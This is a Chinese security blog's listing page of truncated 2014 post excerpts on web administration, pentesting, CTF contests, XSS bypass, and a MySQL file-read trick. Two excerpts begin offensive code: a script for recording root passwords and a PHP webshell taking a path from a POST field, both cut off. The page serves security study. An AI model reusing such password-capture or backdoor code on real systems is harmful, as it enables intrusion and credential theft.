admin 11年前 (2014-05-29) 2800浏览 0评论

1、在终端中执行sudo a2enmod rewrite指令。或者通过将 /etc/apache2/mods-available/rewrite.load 连接到 /etc/apache2/mods-enabled/rewrite.load 来打开 ...

admin 11年前 (2014-05-29) 1683浏览 0评论

日期与时间都是每个PHP程式员经常要用到的技术,特别是做查询类,日期查询更是要经常要用到. PHP时间大的来分有两种,一是时间戳类型(1228348800),二是正常日期格式(2008-12-4) 所以存到数据库也有两种形式了(真正不止,我的应用就两...

admin 11年前 (2014-05-28) 1818浏览 0评论

刚才搞到一台机器，虽然没用多长时间，但是过程也还算比较精彩，就寻思着发出来给大家分享，由于没什么特殊的部分，文章也是成功之后才写的，截图就不上了（其实主要原因是排版插入图片太费事），读者请自行脑补截图。 描述事情经过之前先大概描述一下处境吧 目标机器...

admin 11年前 (2014-05-28) 3495浏览 0评论

5 月，微软在13日发布月度安全更新，其中 有KB2871997和 KB2928120 两个知识库文章Knowledgeased（而KB2871997甚至不是Security Bulletin）。对于无论是作为攻击的渗透测试人员还是作为防守的管理员都...

admin 11年前 (2014-05-28) 1795浏览 0评论

大赛进行了两天，大起大落有，丧失信心也有，但最后还是挺过来了。多亏了给力的队友，blink和test，最后拿到了西北赛区的第二名。     简单叙述一下整个过程吧，顺便记录一下平时没有注意的一些点。     第一天的比赛是CTF类型的，实话说我不擅长...

admin 11年前 (2014-05-28) 3109浏览 1评论

尽管现在呼吁所有的程序都使用unicode编码，所有的网站都使用utf-8编码，来一个统一的国际规范。但仍然有很多，包括国内及国外（特别是非英语国家）的一些cms，仍然使用着自己国家的一套编码，比如gbk，作为自己默认的编码类型。也有一些cms为了考...

admin 11年前 (2014-05-27) 3254浏览 0评论

burp suite代理https的时候，会使用服务器传过来的CA证书与服务器进行数据交互，而burp会把自己的证书数据传送给客户端（浏览器），而客户端 （浏览器）需要信任burp的证书，这样进行交互burp才能捕获到明文数据，如果你用burp做代理...

admin 11年前 (2014-05-27) 2746浏览 0评论

背景 本文来自于之前我发的一篇微博： 不过写这篇文章并不是为了帮大家准备面试，而是想借这道题来介绍计算机和互联网的基础知识，让读者了解它们之间是如何关联起来的。 为了便于理解，我将整个过程分为了六个问题来展开。 第一个问题：从输入 URL 到浏览...

admin 11年前 (2014-05-27) 1971浏览 0评论

转载请注明：jinglingshu的博客 » 安全宝工作原理...

admin 11年前 (2014-05-26) 1538浏览 0评论

七月的夏天 早年我并不知道Python写的Web应用是怎么部署的，总觉得像PHP、ASP一样，仅仅提供一个语言级别的执行模块，直接嵌入Web服务器运行，甚至于直接对外提供带扩展名的URL都是自然而然的事情。 前一阵学习了Python，总是如别人一样，...

admin 11年前 (2014-05-26) 2029浏览 0评论

一、漏洞类型说明 1、  高危漏洞 高危漏洞包括：SQL注入漏洞、XSS跨站脚本漏洞、页面存在源代码泄露、网站存在备份文件、网站存在包含SVN信息的文件、网站存在Resin任意文件读取漏洞。 SQL注入漏洞：网站程序忽略了对输入字符串中包含的SQL语...

admin 11年前 (2014-05-26) 4166浏览 1评论

众所周知，Mysql的用户在没有File权限情况下是无法通过Load_file读文件 或者通过into dumpfile 或者into outfile去写文件，但是偶尔在一个网站上发现个小技巧，也就是通过load data local infile可...

admin 11年前 (2014-05-25) 2509浏览 0评论

相信只要是从事软件开发， 多多少少都会涉及到数据包的抓取。常见的有网页数据抓取（即网页爬虫），应用程序数据包抓取等。网页数据抓取比较简单， 在chrome下可以非常方便的分析网页结构和数据请求；而应用程序数据包的抓取则相对复杂些， 通常需要配置代理...

admin 11年前 (2014-05-25) 2360浏览 0评论

自己并不擅长xss，作为抛砖引玉的一篇总结文章，分享一下自己的见解，其实写出来感觉很惶恐。都是之前看M写的一些文章学到的姿势，在这里跪谢。 我这里的绕过侧重于白盒审计，所以不用各种测试测试很久，只用根据源码中的fliter规则写出合适的exp。 后端...

admin 11年前 (2014-05-25) 1976浏览 0评论

在 以前，可能就许多互联网厂商来说，对于漏洞都没有一个直观的认识，更别说普通的网民了。今年以来，包括这次的OpenSSL或者上次的携程、支付宝等爆出 的漏洞，不管是厂商还是组件，都让大家对漏洞有了进一步的认识。从去年到今年以来，各种SRC遍地开花，...

admin 11年前 (2014-05-25) 1764浏览 0评论

今天是一个特别的日子，早上大家还在讨论XP停止服务的事，到处是相关的新闻和文章，到了下午，到处都是OpenSSL的漏洞消息了。   OpenSSL与SSL安全协议   什么是SSL安全协议，我记得在10年我写过一篇简单介绍的文章，小谈...

admin 11年前 (2014-05-25) 2727浏览 0评论

一、Start Apache 2 Server /启动apache服务 # /etc/init.d/apache2 start or $ sudo /etc/init.d/apache2 start 二、 Restart Apache 2 Serve...

admin 11年前 (2014-05-25) 4281浏览 0评论

0×00 渗透的很多时候，找到的工具并不适用，自己码代码才是王道，下面三个程序都是渗透时在网络上找不到合适工具，自己辛苦开发的，短小使用，求欣赏，求好评。 0×01 记录root密码小工具 root.py #!/usr/bin/python imp...

admin 11年前 (2014-05-25) 1996浏览 0评论

*本文阐述的漏洞已被上报锤子科技并已确认修补。 Smartisan OS是锤子科技推出基于Android定制的移动操作系统。该系统于去年3月27日在国家会议中心由罗永浩首次公布。在2014年4月11日发布V0.9.9.7 alpha版本中，系统新增...

admin 11年前 (2014-05-25) 2855浏览 1评论

这个后门是在渗透某站时遇到的，贴代码： <?php $f = realpath(dirname(__FILE__) . "/../") . $_POST["z1"]; $c = $_POST[&quo...